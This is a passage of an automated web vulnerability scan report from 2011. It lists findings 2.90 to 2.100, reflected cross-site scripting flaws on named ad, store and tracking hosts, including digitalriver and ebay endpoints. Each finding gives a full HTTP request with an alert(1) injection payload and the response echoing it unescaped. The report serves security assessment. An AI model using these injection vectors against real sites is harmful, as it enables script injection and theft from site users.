Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:50 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:50 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:50 GMT
Set-Cookie: t387652495=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZySDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoPL;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:50 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2686

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
<a href="http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click6c46a'-alert(1)-'726db27dea2" target="_blank">
...[SNIP]...

2.90. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 234df"><script>alert(1)</script>365dc5ee018 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.click&234df"><script>alert(1)</script>365dc5ee018=1 HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:51 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:51 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:51 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:51 GMT
Set-Cookie: t566813582=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZzSDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoMG;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:51 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
<a href="http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click&234df"><script>alert(1)</script>365dc5ee018=1" target="_blank">
...[SNIP]...

2.91. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af784'-alert(1)-'d1d4270fbfd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.click&af784'-alert(1)-'d1d4270fbfd=1 HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:55 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:55 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:55 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:55 GMT
Set-Cookie: t744342899=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZ3SDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoM7;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:55 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
<a href="http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click&af784'-alert(1)-'d1d4270fbfd=1" target="_blank">
...[SNIP]...

2.92. http://de17a.com/a/41565.iframe [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://de17a.com
Path:   /a/41565.iframe

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a472b"-alert(1)-"0b25fc585f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/41565.iframe;c?url=http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565.click&a472b"-alert(1)-"0b25fc585f9=1 HTTP/1.1
Host: de17a.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/PPS/iview/msnnkmse001728x90Xseeph10000002pps/direct/01
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cc=1.1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 02 Aug 2011 18:56:53 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: d0="1.AbN%2FBJUBAaN%2Bk30BwwEEXaIDBAHICgY1SDhOC5OCgwGjfpN9AcMBCAIAVVMDBmp7FzIEBjVIOE4FCAgAAADCwgAAGEKFBJUBAaN%2Bk30BkwECg8s%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:53 GMT
Set-Cookie: d3="1.AZOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTOA%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:53 GMT
Set-Cookie: d4="1.AZOBBMIKAaN%2Bk30BwwGTAwGjf5OTf4OTBAgQADIwMTEtMDgtMDIgMjA6NTUFAvODg4ODg4OTeg%3D%3D";Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:53 GMT
Set-Cookie: t297531640=1.AbOGswGjfpN9AZMBApMB0wEIAgBVUwMGansXMgQGMEg4TgUICAAAAMLCAAAYQgaTgoMBo36TfQHDAQgCAFVTAwZqexcyBAZ1SDhOBQgIAAAAwsIAABhChQSVAQGjfpN9AZMBAoOm;Path=/;Domain=.de17a.com;Expires=Wed, 07-Aug-2030 05:36:53 GMT
Set-Cookie: t288398814=;Path=/;Domain=.de17a.com;Expires=Thu, 01-Jan-1970 00:00:00 GMT
P3P: CP="NON CURa ADMa DEVa TAIa OUR STP IND UNI COM NAV"
Content-Length: 2697

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
   <style>

...[SNIP]...
edVersion: 8, width: 728, height: 90, variables: { clickTag: "http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click&a472b"-alert(1)-"0b25fc585f9=1", clickTAG: "http://clk.atdmt.com/go/msnnkmse001728x90Xseeph10000002pps/direct;ai.181044531.229288424;ct.1/01?href=http://de17a.com/a/41565/51201.click&a472b"-alert(1)-"0b25fc585f9=1", actionTag: "h
...[SNIP]...

2.93. http://display.digitalriver.com/ [aid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the aid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e0ab'-alert(1)-'5a57fb80789 was submitted in the aid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:29:59 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 02:59:59 GMT
Last-Modified: Thu, 04 Aug 2011 02:29:59 GMT
Content-Length: 232
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=2448e0ab'-alert(1)-'5a57fb80789&tax=microsoft';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.94. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20f02'-alert(1)-'8212d8e5b54 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:30:00 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 03:00:00 GMT
Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT
Content-Length: 235
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft&20f02'-alert(1)-'8212d8e5b54=1';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.95. http://display.digitalriver.com/ [tax parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://display.digitalriver.com
Path:   /

Issue detail

The value of the tax request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20c10'-alert(1)-'d3cdeb66c64 was submitted in the tax parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64 HTTP/1.1
Host: display.digitalriver.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Date: Thu, 04 Aug 2011 02:30:00 GMT
Server: Apache/2.2.9
Expires: Thu, 04 Aug 2011 03:00:00 GMT
Last-Modified: Thu, 04 Aug 2011 02:30:00 GMT
Content-Length: 232
Connection: close
Content-Type: text/html

var dgt_script = document.createElement('SCRIPT');
dgt_script.src = document.location.protocol + '//a.netmng.com/?aid=244&tax=microsoft20c10'-alert(1)-'d3cdeb66c64';
document.getElementsByTagName('head')[0].appendChild(dgt_script);

2.96. http://dri1.img.digitalrivercontent.net/store [CategoryID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dri1.img.digitalrivercontent.net
Path:   /store

Issue detail

The value of the CategoryID request parameter is copied into the HTML document as plain text between tags. The payload 5b2e2<script>alert(1)</script>c59e91a205d was submitted in the CategoryID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=383363005b2e2<script>alert(1)</script>c59e91a205d&size=1000&version=2&output=json&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1
Host: dri1.img.digitalrivercontent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Content-Length: 374397
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Thu, 04 Aug 2011 02:36:16 GMT
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: private
Access-Control-Allow-Origin: *
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: max-age=86400
Expires: Fri, 05 Aug 2011 02:36:37 GMT
Date: Thu, 04 Aug 2011 02:36:37 GMT
Connection: close


<!-- REQUEST ID: TIME=1312425375967:NODE=c1a7104:THREAD=5619 -->


/* Digital River ProductInfo Widget */
/* JSON Output */


dr.autocomplete.initialize({"productInfo":{"categoryID":"383363005b2e2<script>alert(1)</script>c59e91a205d","startIndex":0,"size":1000,"totalSize":1005,"product":[{"productID":216507400,"displayName":"Kinect for Xbox 360","msSearchRank":9,"msImage_S":"hardware/cart/en-US_Xbox360_Kinect_Sensor_LPF-00004.jpg
...[SNIP]...

2.97. http://dri1.img.digitalrivercontent.net/store [output parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dri1.img.digitalrivercontent.net
Path:   /store

Issue detail

The value of the output request parameter is copied into a JavaScript inline comment. The payload 13c27*/alert(1)//b6adf105f78 was submitted in the output parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /store?SiteID=msstore&Locale=en_US&Action=DisplayDRProductInfo&CategoryID=38336300&size=1000&version=2&output=json13c27*/alert(1)//b6adf105f78&content=displayName+msSearchRank+msImage_S&orderBy=msSearchRank+descending&catalog=false&jsonp=dr.autocomplete.initialize HTTP/1.1
Host: dri1.img.digitalrivercontent.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.microsoftstore.com/store/msstore/home?WT.mc_id=MSCOM_DLC_US_BL_BuyMS

Response

HTTP/1.1 200 OK
Content-Length: 261643
Content-Type: text/javascript;charset=UTF-8
Last-Modified: Thu, 04 Aug 2011 02:36:51 GMT
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: private
X-Powered-By: ASP.NET
P3P: CP="CAO DSP TAIa OUR IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: max-age=86400
Expires: Fri, 05 Aug 2011 02:36:59 GMT
Date: Thu, 04 Aug 2011 02:36:59 GMT
Connection: close


<!-- REQUEST ID: TIME=1312425411323:NODE=c1a7404:THREAD=6134 -->


/* Digital River ProductInfo Widget */
/* JSON13C27*/ALERT(1)//B6ADF105F78 Output */


(function(){

var jsonData = {"productInfo":{"categoryID":38336300,"startIndex":0,"size":100
...[SNIP]...

2.98. http://edpn.ebay.com/engagement [INIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edpn.ebay.com
Path:   /engagement

Issue detail

The value of the INIT request parameter is copied into the XML document as plain text between tags. The payload a444c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>c44e3c3b82c was submitted in the INIT parameter. This input was echoed as a444c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c44e3c3b82c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /engagement?INIT=252455582138|7988220|7111317502570720|1|10.3|0|4|http://weather.uk.msn.com/a444c<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>c44e3c3b82c HTTP/1.1
Host: edpn.ebay.com
Proxy-Connection: keep-alive
Referer: http://m.adnxs.com/tt?member=280&inv_code=UK9NWR&cb=320488031
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btrm/svid%3D42194686481501a74ae^cguid/8fa69d671310a47a24716fb1ff91af98501a74ae^

Response

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Connection: Close
Content-Length: 220

<result>
<engagement><![CDATA[252455582138|7988220|7111317502570720|1|10.3|0|4|http://weather.uk.msn.com/a444c<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>c44e3c3b82c]]></e
...[SNIP]...

2.99. http://edpn.ebay.com/engagement [flashINIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edpn.ebay.com
Path:   /engagement

Issue detail

The value of the flashINIT request parameter is copied into the XML document as plain text between tags. The payload 40c6b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a213b663f58 was submitted in the flashINIT parameter. This input was echoed as 40c6b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a213b663f58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Request

GET /engagement?flashINIT=252455582138|7988220|7111317502570720|140c6b<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>a213b663f58 HTTP/1.1
Host: edpn.ebay.com
Proxy-Connection: keep-alive
Referer: http://img-cdn.mediaplex.com/0/711/131750/83635_US_2011_Q3_Pattern_Default_300x250.swf?ir_DAP_M0=0&ir_DAP_M1=7111317502570720&ir_DAP_M2=7988220&ir_DAP_M3=&ir_DAP_M4=&ir_DAP_M5=&ir_DAP_M6=&ir_DAP_M7=&ir_DAP_M8=&ir_DAP_M9=&ir_DAP_M10=&dap3_template_id=7988220&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I101=0&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=252455582138
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: npii=btrm/svid%3D42194686481501a74ae^cguid/8fa69d671310a47a24716fb1ff91af98501a74ae^

Response

HTTP/1.1 200 OK
Content-Type: text/xml; charset=utf-8
Connection: Close
Content-Length: 184

<result>
<engagement><![CDATA[252455582138|7988220|7111317502570720|140c6b<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>a213b663f58]]></engagement>
</result>

2.100. http://frontend-loadbalancer.meteorsolutions.com/api/track [jsonp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://frontend-loadbalancer.meteorsolutions.com
Path:   /api/track

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 50b07<script>alert(1)</script>d134b251f59 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/track?application_id=081c924b-ddfd-447a-8c7a-2db01211cae7&url_fbid=Zr7DxOZ9tRO&parent_fbid=&referrer=&location=http%3A%2F%2Fwww.discoverbing.com%2F&url_tag=NOMTAG&output=jsonp&jsonp=meteor.json_query_callback(%24json%2C%200)%3B50b07<script>alert(1)</script>d134b251f59 HTTP/1.1
Host: frontend-loadbalancer.meteorsolutions.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/javascript
Date: Tue, 02 Aug 2011 18:34:40 GMT
Etag: "7466ea447b7cc0bebd03d2ab15e689727215ee63"
P3P: CP="NID DSP ALL COR"
Server: nginx/0.7.65
Set-Cookie: meteor_server_081c924b-ddfd-447a-8c7a-2db01211cae7=081c924b-ddfd-447a-8c7a-2db01211cae7%3C%3EZr7DxOZ9tRO%3C%3E%3C%3E%3C%3Ehttp%253A%2F%2Fwww.discoverbing.com%2F; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/
Set-Cookie: uid=c24daa55-d689-43c1-bfdf-08ee61c39dda; Domain=.meteorsolutions.com; expires=Wed, 01 Aug 2012 18:34:40 GMT; Path=/
Content-Length: 174
Connection: keep-alive

meteor.json_query_callback({"parent_id": "", "id": "Zr7DxOZ9tRO", "uid": "c24daa55\\x2Dd689\\x2D43c1\\x2Dbfdf\\x2D08ee61c39dda"}, 0);50b07<script>alert(1)</script>d134b251f59

